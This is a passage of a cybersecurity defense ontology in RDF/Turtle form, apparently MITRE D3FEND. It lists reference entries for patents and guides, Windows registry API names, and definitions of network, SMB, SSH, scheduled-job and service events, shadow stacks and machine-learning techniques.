deterrence system employing a virtual network" ; d3f:has-link "https://patents.google.com/patent/US7240368B1"^^xsd:anyURI ; d3f:kb-reference-of d3f:NetworkTrafficSignatureAnalysis ; d3f:kb-reference-title "Intrusion and misuse deterrence system employing a virtual network" . d3f:Reference-LibreNMSDocsOxidizedExtension a d3f:UserManualReference, owl:NamedIndividual ; rdfs:label "Reference - Libre NMS - Oxidized Extension" ; d3f:has-link "https://docs.librenms.org/Extensions/Oxidized/"^^xsd:anyURI ; d3f:kb-abstract """Integrating LibreNMS with Oxidized brings the following benefits: * Config viewing: Current, History, and Diffs all under the Configs tab of each device * Automatic addition of devices to Oxidized: Including filtering and grouping to ease credential management * Configuration searching""" ; d3f:kb-organization "LibreNMS.org" ; d3f:kb-reference-of d3f:DiskEncryption ; d3f:kb-reference-title "LibreNMSDocs - Oxidized Extension" . d3f:Reference-RemotelyTriggeredBlackHoleFiltering-Cisco a d3f:AcademicPaperReference, owl:NamedIndividual ; rdfs:label "Reference - Remotely Triggered Black Hole FIltering - Cisco" ; d3f:has-link "https://www.cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf"^^xsd:anyURI ; d3f:kb-organization "Cisco" ; d3f:kb-reference-title "Remotely Triggered Black Hole Filtering - Destination Based and Source Based" . d3f:Reference-Securing_Web_Transactions__TLS_Server_Certificate_Management_Appendix_A_Passive_Inspection a d3f:GuidelineReference, owl:NamedIndividual ; rdfs:label "Reference - Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection" ; d3f:has-link "https://www.nccoe.nist.gov/publication/1800-16/VolD/vol-d-appendix.html"^^xsd:anyURI ; d3f:kb-abstract "The example implementation demonstrates the ability to perform passive inspection of encrypted TLS connections. The question of whether or not to perform such an inspection is complex. There are important tradeoffs between traffic security and traffic visibility that each organization should consider. Some organizations prefer to decrypt internal TLS traffic, so it can be inspected to detect attacks that may be hiding within encrypted connections. Such inspection can detect intrusion, malware, and fraud, and can conduct troubleshooting, forensics, and performance monitoring. For these organizations, TLS inspection may serve as both a standard practice and a critical component of their threat detection and service assurance strategies." ; d3f:kb-author "NIST" ; d3f:kb-reference-of d3f:PassiveCertificateAnalysis ; d3f:kb-reference-title "Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection" . d3f:Reference-SystemAndMethodForManagedSecurityAssessmentAndMitigation a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - System and method for managed security assessment and mitigation" ; d3f:has-link "https://patents.google.com/patent/US9544324B2"^^xsd:anyURI ; d3f:kb-abstract "In an embodiment of the invention, a system for assessing vulnerabilities includes: a security management system; a network device in a system under test (SUT), wherein the network device is privy to traffic in the SUT; and wherein the SMS is privy to traffic that is known by the network device and/or to one or more traffic observations that is known by the network device." ; d3f:kb-author "Scott Parcel" ; d3f:kb-organization "Cenzic Inc, Trustwave Holdings Inc" ; d3f:kb-reference-of d3f:NetworkVulnerabilityAssessment ; d3f:kb-reference-title "System and method for managed security assessment and mitigation" . d3f:Reference-SystemAndMethodsThereofForDetectionOfPersistentThreatsInAComputerizedEnvironmentBackground_PaloAltoNetworksIncCyberSecdoLtd a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - System and methods thereof for detection of persistent threats in a computerized environment background - Palo Alto Networks IncCyber Secdo Ltd" ; d3f:has-link "https://patents.google.com/patent/US20170206358A1/en?oq=US-2017206358-A1"^^xsd:anyURI ; d3f:kb-abstract "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected." ; d3f:kb-author "Gil BARAK" ; d3f:kb-mitre-analysis "The patent describes detecting malicious events on a host. For each new event (e.x. new file request received from a user device, a change in an existing file in a container) a causality chain is developed for all threads associated with the event. The causality chain identifies the thread that started the process of the event (main thread). If a thread in the causality chain has no parent, i.e. no main thread associated with it, the process is identified as malicious." ; d3f:kb-organization "Palo Alto Networks IncCyber Secdo Ltd" ; d3f:kb-reference-title "System and methods thereof for detection of persistent threats in a computerized environment background" . d3f:Reference-TechnicalProductGuideTriconSystems a d3f:UserManualReference, owl:NamedIndividual ; rdfs:label "Reference - Technical Product Guide Tricon Systems" ; d3f:has-link "https://www.nrc.gov/docs/ml0932/ml093290424.pdf"^^xsd:anyURI ; d3f:kb-abstract "Information in this document is subject to change without notice. Companies, names and data used in examples herein are fictitious unless otherwise noted. No part of this document may be reproduced or transmitted in any form or by any means, electronic or mechanical, for any purpose, without the express written permission of Triconex" ; d3f:kb-organization "Rockwell Automation" ; d3f:kb-reference-of d3f:DisableRemoteAccess ; d3f:kb-reference-title "Technical Product Guide Tricon Systems" . d3f:Reference-TechniquesForImpedingAndDetectingNetworkThreats_VerisignInc a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Techniques for impeding and detecting network threats - Verisign Inc" ; d3f:has-link "https://patents.google.com/patent/US10904273B1/"^^xsd:anyURI ; d3f:kb-abstract """Infinite DNS decoy trap resource to catch threats scanning for network resources to attack. In various embodiments, a name server transmits a canonical name as resolution to another canonical name. In operation, when a resource name is requested for resolution, a determination is made that the resource name corresponds to a trap resource name. A first canonical name is transmitted as resolution to the trap resource name. The first canonical name is requested for resolution, and a second canonical name is transmitted as resolution. By providing trap canonical names as resolutions to trap canonical names, unauthorized software making the resolution requests is kept occupied with requesting resolution of canonical name after canonical name, impeding the ability of the unauthorized software from traversing a network.""" ; d3f:kb-author "Ben McCarty, James Graham" ; d3f:kb-mitre-analysis "MITRE Analysis was not found." ; d3f:kb-organization "Verisign Inc" ; d3f:kb-reference-of d3f:DecoyNetworkResource ; d3f:kb-reference-title "Techniques for impeding and detecting network threats" . d3f:Reference-TrustedCommunicationsWithChildProcesses_MicrosoftTechnologyLicensingLLC a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Trusted Communications With Child Processes - Microsoft Technology Licensing LLC" ; d3f:has-link "https://patents.google.com/patent/US20120174210A1"^^xsd:anyURI ; d3f:kb-abstract "A method to identify a child process to a parent process in an operating system includes obtaining a token and login identifier from the operating system. The parent process creates a remote procedure call communications endpoint to communicate with the child process. Thereafter, a child process is spawned by the parent process. A child-initiated request to communicate with the parent process is then received by the parent process. In order to verify the identity of the child-initiated request, the parent process impersonates the child process and receives as identifier that identifies the requestor child process. The requestor process identifier and the spawned child identifier are compared. Based on the comparison, the parent process responds to the child-initiated request. In another embodiment, process identifiers are used by the parent process to verify the identity of a child process the requests communication with the parent process." ; d3f:kb-author "Kedarnath Atmaram Dubhashi, Jonathan D. Schwartz, Sambavi Muthukrishnan, Simon Skaria" ; d3f:kb-mitre-analysis "This patent describes a technique for detecting malicious processes that claim to be the child process of a legitimate parent process. During the spawning of a child process, a child process identifier is generated. The child process identifier is a unique identifier that can be used to identify a child process. The child process identifier is transmitted by the security system of the operating system to the parent process. The parent process keeps track of the child process identifier. When a new child-initiated communications request is received by the parent process, the parent process checks if the requesting child process identifier and the child process identifier that the parent process is tracking are the same. If the identifiers are not the same, the parent process refuses the request." ; d3f:kb-organization "Microsoft Technology Licensing LLC" ; d3f:kb-reference-title "Trusted Communications With Child Processes" . d3f:Reference-UseRkillToStopMalwareProcesses-Ghacks.net a d3f:TechniqueReference, owl:NamedIndividual ; rdfs:label "Reference - Use Rkill to Stop Malware Processes - ghacks.net" ; d3f:has-link "https://www.ghacks.net/2011/07/29/use-rkill-to-stop-malware-processes/"^^xsd:anyURI ; d3f:kb-author "Melanie Gross" ; d3f:kb-organization "ghacks.net" ; d3f:kb-reference-of d3f:ProcessTermination ; d3f:kb-reference-title "Use Rkill to Stop Malware Processes" . d3f:RegOpenKeyA a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyA" . d3f:RegOpenKeyExA a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyExA" . d3f:RegOpenKeyExW a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyExW" . d3f:RegOpenKeyTransactedA a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyTransactedA" . d3f:RegOpenKeyTransactedW a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyTransactedW" . d3f:RegOpenKeyW a d3f:GetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegOpenKeyW" . d3f:RegSetKeyValueA a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetKeyValueA" . d3f:RegSetKeyValueW a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetKeyValueW" . d3f:RegSetValueA a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetValueA" . d3f:RegSetValueExA a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetValueExA" . d3f:RegSetValueExW a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetValueExW" . d3f:RegSetValueW a d3f:SetSystemConfigValue, owl:NamedIndividual ; rdfs:label "RegSetValueW" . d3f:RegexMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Regex Matching" ; d3f:d3fend-id "D3A-RM" ; d3f:definition "Regular expression matching is type of partial string matching using a regular expression, which is a sequence of characters that specifies a match pattern in text." ; d3f:kb-article """## How it works A regular expression (shortened as regex or regexp) is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for "find" or "find and replace" operations on strings, or for input validation. ## Key Test Considerations - **External review of regular expressions**: Regular expressions used in rules should be reviewed by a independent developer SME. Regex testing and visualization tools may be used to aid this review. Back-tests for failure modes identified during the review shoud be developed. Regular expressions are easy to get wrong and may appear to work on limited tests; small mistakes can lead to unintended misses and matches.] - **Processing Performance Review**: Review of resource-intensive rules may be necessary if system performance degraded. Look for cases of “exponential backtracking” Some regexes are computationally expensive. ## References 1. Regular expression. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Regular_expression). 2. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm).""" ; d3f:synonym "Regex", "Regexp" ; rdfs:subClassOf d3f:PartialMatching . d3f:Relational-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Relational-based Transfer Learning" ; d3f:d3fend-id "D3A-RBTL" ; d3f:definition "Relational-based Transfer Learning is a subfield of machine learning where knowledge and patterns learned from one domain, characterized by relational and structured data, are transferred to enhance the learning of another related domain. This approach leverages shared concepts, relations, and structures across domains, taking advantage of the rich semantic knowledge within relational data to improve learning performance in the target task." ; d3f:kb-article """## References V7 Labs. (n.d.). Transfer Learning Guide. [Link](https://www.v7labs.com/blog/transfer-learning-guide#:~:text=Relational%2Dbased%20transfer%20learning%20approaches,domain%20to%20the%20target%20domain).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:RemoteAuthenticationService a owl:Class ; rdfs:label "Remote Authentication Service" ; d3f:definition "A remote authentication service provides for the authentication of a user across a network (i.e., remotely)." ; rdfs:subClassOf d3f:AuthenticationService, d3f:NetworkService . d3f:RemoteAuthorizationService a owl:Class ; rdfs:label "Remote Authorization Service" ; d3f:definition "A remote authorization service provides for the authorization of a user across a network (i.e., remotely)." ; rdfs:subClassOf d3f:AuthorizationService . d3f:RemoteDatabaseQuery a owl:Class ; rdfs:label "Remote Database Query" ; d3f:definition "A remote query session enabling a user to make an SQL, SPARQL, or similar query over the network from one host to another." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DatabaseQuery, d3f:RemoteCommand . d3f:RemoteLoginSession a owl:Class ; rdfs:label "Remote Login Session" ; d3f:definition "A remote login session is a login session where a client has logged in from their local host machine to a server via a network." ; rdfs:subClassOf d3f:NetworkSession . d3f:RemoteProcedureCall a owl:Class ; rdfs:label "Remote Procedure Call" ; d3f:definition "In distributed computing a remote procedure call (RPC) is when a computer program causes a procedure (subroutine) to execute in another address space (commonly on another computer on a shared network), which is coded as if it were a normal (local) procedure call, without the programmer explicitly coding the details for the remote interaction. That is, the programmer writes essentially the same code whether the subroutine is local to the executing program, or remote. This is a form of client-server interaction (caller is client, executor is server), typically implemented via a request-response message-passing system. The object-oriented programming analog is remote method invocation (RMI). The RPC model implies a level of location transparency." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:RemoteCommand . d3f:RemoteShellCommand a owl:Class ; rdfs:label "Remote Shell Command" ; d3f:definition "A remote shell command is a command sent from one computer to another to be executed on the remote computer. One example of this, is through a command-line interface (CLI) like using Invoke-Command from PowerShell or a command sent through an ssh session. This class generalizes to all means of sending a command through an established protocol to control capabilities on a remote computer." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RemoteCommand . d3f:RemoteTerminalSession a owl:Class ; rdfs:label "Remote Terminal Session" ; d3f:definition "A remote terminal session is a session that provides a user access from one host to another host via a terminal." ; rdfs:subClassOf d3f:NetworkSession . d3f:RemoveUserFromGroupEvent a owl:Class ; rdfs:label "Remove User from Group Event" ; d3f:definition "An event where a user is removed from a group, revoking the permissions and privileges associated with the group from the user." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:AddUserToGroupEvent ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:UserAccount ], d3f:GroupManagementEvent . d3f:ResidualNeuralNetwork a owl:Class, owl:NamedIndividual ; rdfs:label "Residual Neural Network" ; d3f:d3fend-id "D3A-RNN" ; d3f:definition "A residual neural network (ResNet) is an artificial neural network (ANN). It is a gateless or open-gated variant of the HighwayNet, the first working very deep feedforward neural network with hundreds of layers, much deeper than previous neural networks." ; d3f:kb-article """## References Wikipedia contributors. (2021, August 23). Residual neural network. In Wikipedia, The Free Encyclopedia. [Link](https://en.wikipedia.org/wiki/Residual_neural_network)""" ; rdfs:subClassOf d3f:ConvolutionalNeuralNetwork . d3f:RestorationEvent a owl:Class, owl:NamedIndividual ; rdfs:label "Restoration Event" ; d3f:definition "An event representing actions to return a compromised system or resource to a trusted operational state, such as through backup restoration, system reinstallation, or repair." ; d3f:related d3f:Restore ; rdfs:subClassOf d3f:SecurityEvent . d3f:ReverseProxyServer a owl:Class ; rdfs:label "Reverse Proxy Server" ; d3f:definition "In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client, appearing as if they originated from the proxy server itself. Unlike a forward proxy, which is an intermediary for its associated clients to contact any server, a reverse proxy is an intermediary for its associated servers to be contacted by any client. In other words, a proxy acts on behalf of the client(s), while a reverse proxy acts on behalf of the server(s); a reverse proxy is usually an internal-facing proxy used as a 'front-end' to control and protect access to a server on a private network." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:ProxyServer . d3f:RevokePrivilegesFromGroupEvent a owl:Class ; rdfs:label "Revoke Privileges from Group Event" ; d3f:definition "An event where specific privileges or rights are removed from a group, restricting its members from performing actions or accessing resources previously allowed by those privileges." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:AssignPrivilegesToGroupEvent ], d3f:GroupManagementEvent, d3f:PermissionRevokingEvent . d3f:RubyScriptFile a d3f:ExecutableScript, owl:NamedIndividual ; rdfs:label "Ruby Script File" . d3f:SARSA a owl:Class, owl:NamedIndividual ; rdfs:label "SARSA" ; d3f:d3fend-id "D3A-SAR" ; d3f:definition "State-action-reward-state-action (SARSA) is an algorithm for learning a Markov decision process policy, used in the reinforcement learning area of machine learning." ; d3f:kb-article """## References State-action-reward-state-action. Wikipedia. [Link](https://en.wikipedia.org/wiki/State%E2%80%93action%E2%80%93reward%E2%80%93state%E2%80%93action).""" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Model-freeReinforcementLearning . d3f:SMBFileOpenEvent a owl:Class ; rdfs:label "SMB File Open Event" ; d3f:definition "An event where a file is opened if it exists, failing otherwise. This operation is used to access or query the existing file." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:SMBFileCreateEvent ], d3f:SMBEvent . d3f:SMBFileOpenIfEvent a owl:Class ; rdfs:label "SMB File Open If Event" ; d3f:definition "An event where a file is opened if it exists, or created if it does not. This operation merges file creation and access behavior." ; rdfs:subClassOf d3f:SMBEvent . d3f:SMBFileOverwriteEvent a owl:Class ; rdfs:label "SMB File Overwrite Event" ; d3f:definition "An event where a file is opened and truncated if it exists, failing if the file does not already exist. This operation is destructive and focuses on replacing the file's contents." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:SMBFileCreateEvent ], d3f:SMBEvent . d3f:SMBFileOverwriteIfEvent a owl:Class ; rdfs:label "SMB File Overwrite If Event" ; d3f:definition "An event where a file is opened and truncated if it exists, or created otherwise. This operation combines destructive overwrite and creation behaviors." ; rdfs:subClassOf d3f:SMBEvent . d3f:SMBFileSupersedeEvent a owl:Class ; rdfs:label "SMB File Supersede Event" ; d3f:definition "An event where a file is overwritten if it exists or created if it does not. This operation combines file creation and modification semantics." ; rdfs:subClassOf d3f:SMBEvent . d3f:SSHConnectionCloseEvent a owl:Class ; rdfs:label "SSH Connection Close Event" ; d3f:definition "An event indicating the termination of an SSH connection, signaling the end of a secure session." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:SSHConnectionOpenEvent ], d3f:NetworkConnectionCloseEvent, d3f:SSHEvent . d3f:SSHConnectionFailEvent a owl:Class ; rdfs:label "SSH Connection Fail Event" ; d3f:definition "An event indicating a failure to establish an SSH connection, often due to issues such as authentication errors, network timeouts, or server unavailability." ; rdfs:subClassOf d3f:NetworkConnectionFailEvent, d3f:SSHEvent . d3f:SSHConnectionRefuseEvent a owl:Class ; rdfs:label "SSH Connection Refuse Event" ; d3f:definition "An event indicating that an SSH connection attempt was refused, typically due to server-side restrictions or closed ports." ; rdfs:subClassOf d3f:NetworkConnectionRefuseEvent, d3f:SSHEvent . d3f:SSHConnectionResetEvent a owl:Class ; rdfs:label "SSH Connection Reset Event" ; d3f:definition "An event indicating the abrupt termination of an SSH connection due to protocol errors, network disruptions, or administrative actions." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:SSHConnectionOpenEvent ], d3f:NetworkConnectionResetEvent, d3f:SSHEvent . d3f:SSHListenEvent a owl:Class ; rdfs:label "SSH Listen Event" ; d3f:definition "An event indicating that an SSH server has started listening for incoming connection requests, enabling potential clients to initiate secure sessions." ; rdfs:subClassOf d3f:NetworkConnectionListenEvent, d3f:SSHEvent . d3f:SavedInstructionPointer a owl:Class ; rdfs:label "Saved Instruction Pointer" ; d3f:definition "A saved instruction pointer points to the instruction that generated an exception (trap or fault)." ; rdfs:seeAlso ; rdfs:subClassOf d3f:Pointer, d3f:StackComponent . d3f:ScheduledJobDeletionEvent a owl:Class ; rdfs:label "Scheduled Job Deletion Event" ; d3f:definition "An event marking the removal of a scheduled task from the system, terminating its execution schedule." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ScheduledJobCreationEvent ], d3f:ScheduledJobEvent . d3f:ScheduledJobDisableEvent a owl:Class ; rdfs:label "Scheduled Job Disable Event" ; d3f:definition "An event where a scheduled task is deactivated, preventing further execution until re-enabled." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ScheduledJobEnableEvent ], d3f:ScheduledJobEvent . d3f:ScheduledJobStartEvent a owl:Class ; rdfs:label "Scheduled Job Start Event" ; d3f:definition "An event indicating the execution of a scheduled task, triggered either automatically by the scheduler or manually by a user." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ScheduledJobCreationEvent ], d3f:ScheduledJobEvent . d3f:ScheduledJobUpdateEvent a owl:Class ; rdfs:label "Scheduled Job Update Event" ; d3f:definition "An event where an existing scheduled task is updated, altering parameters such as timing, conditions, or actions." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ScheduledJobCreationEvent ], d3f:ScheduledJobEvent . d3f:Scheduling a owl:Class ; rdfs:label "Scheduling" ; rdfs:subClassOf d3f:Planning . d3f:Second-stageBootLoader a owl:Class ; rdfs:label "Second-stage Boot Loader" ; d3f:definition "An optional, often feature rich, second stage set of routines run in order to load the operating system." ; rdfs:subClassOf d3f:BootLoader . d3f:SecurityArchitects a d3f:TargetAudience, owl:NamedIndividual ; rdfs:label "Security Architects" . d3f:Self-organizingMap a owl:Class, owl:NamedIndividual ; rdfs:label "Self-organizing Map" ; d3f:d3fend-id "D3A-SOM" ; d3f:definition "A Self-Organizing Map (SOM) is a unsupervised learning model in Artificial Neural Network where the feature maps are the generated two-dimensional discretized form of an input space during the model training (based on competitive learning)" ; d3f:kb-article """## References GeeksforGeeks. (n.d.). ANN - Self Organizing Neural Network (SONN). [Link](https://www.geeksforgeeks.org/ann-self-organizing-neural-network-sonn/)""" ; rdfs:subClassOf d3f:ANN-basedClustering . d3f:Semi-supervisedBoosting a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Boosting" ; d3f:d3fend-id "D3A-SSB" ; d3f:definition "Boosting methods can be readily extended to the semi-supervised setting, by introducing pseudo-labeled data after each learning step; which gives rise to the idea of semi-supervised boosting methods. The pseudo-labeling approach of self- training and co-training can be easily extended to boosting methods. Several boosting methods such as SSMBoost, ASSEMBLE, SemiBoost, RegBoost, etc can be found which can be applied for utilizing unlabeled datasets for supervised classifiers." ; d3f:kb-article """## References Jashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)""" ; rdfs:subClassOf d3f:Semi-supervisedWrapperMethod . d3f:Semi-supervisedCluster-then-label a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Cluster-then-label" ; d3f:d3fend-id "D3A-SSCTL" ; d3f:definition "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data." ; d3f:kb-article """## References Jashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)""" ; rdfs:subClassOf d3f:UnsupervisedPreprocessing . d3f:Semi-supervisedCo-training a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Co-training" ; d3f:d3fend-id "D3A-SSCT" ; d3f:definition "Multi-view co-training involves training the classifiers in completely different views of training data. On the other hand, single-view co-training methods are generally applied as ensemble methods." ; d3f:kb-article """## References Jashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)""" ; rdfs:subClassOf d3f:Semi-supervisedWrapperMethod . d3f:Semi-supervisedFeatureExtraction a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Feature Extraction" ; d3f:d3fend-id "D3A-SSFE" ; d3f:definition "Feature extraction refers to reducing the number of dimensions in a data point so that it is computationally feasible and effective to learn a model." ; d3f:kb-article """## References Jashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)""" ; rdfs:subClassOf d3f:UnsupervisedPreprocessing . d3f:Semi-supervisedGenerativeModelLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Generative Model Learning" ; d3f:d3fend-id "D3A-SSGML" ; d3f:definition "A Semi Supervised Machine Learning model which assume that the distributions take some particular form p(x|y,theta) parameterized by the vector. If these assumptions are incorrect, the unlabeled data may actually decrease the accuracy of the solution relative to what would have been obtained from labeled data alone. However, if the assumptions are correct, then the unlabeled data necessarily improves performance." ; d3f:kb-article """## References Weak supervision. Wikipedia. [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).""" ; rdfs:subClassOf d3f:IntrinsicallySemi-supervisedLearning . d3f:Semi-supervisedInductiveLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Inductive Learning" ; d3f:d3fend-id "D3A-SSIL" ; d3f:definition "The goal of inductive learning is to infer the correct mapping from X to Y." ; d3f:kb-article """## References Semi-Supervised Learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning#Semi-supervised_learning). Zhou, D., & Li, M. (2005). Semi-supervised learning by higher order regularization. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL) (pp. 1-9). [Link](https://www.cs.sfu.ca/~anoop/papers/pdf/semisup_naacl.pdf).""" ; rdfs:subClassOf d3f:Semi-SupervisedLearning . d3f:Semi-supervisedManifoldLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Manifold Learning" ; d3f:d3fend-id "D3A-SSML" ; d3f:definition "A version of Semi-Supervised Learning that applies the Manifold assumption that the data like approximately on a manifold of much lower dimension than the input space." ; d3f:kb-article """## References Weak supervision. Wikipedia. [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).""" ; rdfs:subClassOf d3f:IntrinsicallySemi-supervisedLearning . d3f:Semi-supervisedPre-training a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Pre-training" ; d3f:d3fend-id "D3A-SSPT" ; d3f:definition "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data" ; d3f:kb-article """## References Jashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)""" ; rdfs:subClassOf d3f:UnsupervisedPreprocessing . d3f:Semi-supervisedSelf-training a owl:Class, owl:NamedIndividual ; rdfs:label "Semi-supervised Self-training" ; d3f:d3fend-id "D3A-SSST" ; d3f:definition "Self-training is the procedure in which a supervised method for classification or regression is modified it to work in a semi-supervised manner, taking advantage of labeled and unlabeled data" ; d3f:kb-article """## References AltexSoft. (n.d.). Semi-Supervised Learning: A Technical Guide with Python Examples. [Link](https://www.altexsoft.com/blog/semi-supervised-learning/#:~:text=One%20of%20the%20simplest%20examples,of%20labeled%20and%20unlabeled%20data.)""" ; rdfs:subClassOf d3f:Semi-supervisedWrapperMethod . d3f:SeqGAN a owl:Class, owl:NamedIndividual ; rdfs:label "SeqGAN" ; d3f:d3fend-id "D3A-SEQ" ; d3f:definition "Sequence Generation Framework (SeqGAN) models the data generator as a stochastic policy in reinforcement learning (RL), SeqGAN bypasses the generator differentiation problem by directly performing gradient policy update." ; d3f:kb-article """## References Yu, L., Zhang, W., Wang, J., & Yu, Y. (2017). SeqGAN: Sequence Generative Adversarial Nets with Policy Gradient. ArXiv preprint ArXiv:1609.05473. [Link](https://arxiv.org/abs/1609.05473)""" ; d3f:synonym "Sequence GAN" ; rdfs:subClassOf d3f:GenerativeAdversarialNetwork . d3f:SerializationFunction a owl:Class ; rdfs:label "Serialization Function" ; d3f:definition "A function which has an operation that serializes data." ; rdfs:subClassOf d3f:Subroutine . d3f:ServiceDeletionEvent a owl:Class ; rdfs:label "Service Deletion Event" ; d3f:definition "An event capturing the uninstallation or deregistration of a service application, ensuring it is no longer operational or available to clients." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ServiceInstallationEvent ], d3f:ApplicationDeletionEvent, d3f:ServiceEvent . d3f:ServiceDisableEvent a owl:Class ; rdfs:label "Service Disable Event" ; d3f:definition "An event capturing the deactivation of a service application, preventing it from being started or accessed until re-enabled." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ServiceEnableEvent ], d3f:ApplicationDisableEvent, d3f:ServiceEvent . d3f:ServiceRestartEvent a owl:Class ; rdfs:label "Service Restart Event" ; d3f:definition "An event describing the sequential stopping and starting of a service application to refresh its state, apply updates, or resolve operational issues." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ServiceStopEvent ], [ a owl:Restriction ; owl:onProperty d3f:precedes ; owl:someValuesFrom d3f:ServiceStartEvent ], d3f:ApplicationRestartEvent, d3f:ServiceEvent . d3f:ServiceUpdateEvent a owl:Class ; rdfs:label "Service Update Event" ; d3f:definition "An event describing changes made to a service application, such as updates, reconfigurations, or patch installations, ensuring its continued availability and functionality." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:ServiceInstallationEvent ], d3f:ApplicationUpdateEvent, d3f:ServiceEvent . d3f:ShadowStack a owl:Class, owl:NamedIndividual ; rdfs:label "Shadow Stack" ; d3f:copy-of d3f:CallStack ; d3f:definition "A shadow stack is a mechanism for protecting a procedure's stored return address, such as from a stack buffer overflow. The shadow stack itself is a second, separate stack that \"shadows\" the program call stack. In the function prologue, a function stores its return address to both the call stack and the shadow stack. In the function epilogue, a function loads the return address from both the call stack and the shadow stack, and then compares them. If the two records of the return address differ, then an attack is detected." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:copy-of ; owl:someValuesFrom d3f:CallStack ], d3f:DigitalInformationBearer . d3f:SingularValueDecomposition a owl:Class, owl:NamedIndividual ; rdfs:label "Singular Value Decomposition" ; 